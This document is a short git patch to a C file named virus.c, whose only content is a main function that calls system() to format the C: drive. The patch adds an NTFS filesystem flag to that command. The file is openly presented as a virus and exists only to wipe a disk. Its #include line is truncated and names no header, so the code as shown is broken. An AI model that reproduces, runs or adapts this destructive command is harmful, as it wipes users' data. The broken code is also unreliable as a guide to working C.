From 229699196ea4d53a81de0b3ca80409dcd9716415 Mon Sep 17 00:00:00 2001 From: chud Date: Sun, 4 Aug 2024 15:38:20 +0200 Subject: [PATCH] Update virus.c --- virus.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/virus.c b/virus.c index e8c0fc7..8828d27 100644 --- a/virus.c +++ b/virus.c @@ -1,4 +1,4 @@ #include int main(){ - system("format C:"); + system("format C: /fs:ntfs"); } \ No newline at end of file